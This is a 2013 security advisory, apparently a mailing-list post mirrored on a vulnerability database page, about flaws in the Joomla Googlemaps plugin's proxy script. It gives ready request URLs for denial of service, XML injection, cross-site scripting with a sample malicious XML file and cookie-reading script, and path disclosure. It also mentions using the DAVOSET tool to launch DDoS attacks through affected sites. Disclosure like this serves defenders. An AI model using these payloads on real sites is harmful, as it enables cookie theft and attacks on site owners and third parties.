Joomla Googlemaps XSS / XML Injection / Path Disclosure / DoS

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044768 漏洞类型
发布时间 2013-07-17 更新时间 2013-07-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013070124
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Hello list!

These are Denial of Service, XML Injection, Cross-Site Scripting and Full 
path disclosure vulnerabilities in Googlemaps plugin for Joomla.

-------------------------
Affected products:
-------------------------

Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and 
potentially previous versions. In new version of DAVOSET I'll add a lot of 
web sites with Googlemaps plugin.

-------------------------
Affected vendors:
-------------------------

Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147

----------
Details:
----------

Denial of Service (WASC-10):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

Besides conducting DoS attack manually, it's also possible to conduct 
automated DoS and DDoS attacks with using of DAVOSET 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for XSS 
attack:

XSS via XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="utf-8"?>
<feed>
  <title>XSS</title>
  <entry>
  <div 
xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>
  </entry>
</feed>

Cross-Site Scripting (WASC-08):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/content/plugin_googlemap2_proxy.php

Besides plugin_googlemap2_proxy.php, also happens 
plugin_googlemap3_proxy.php (but it has other path at web sites).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua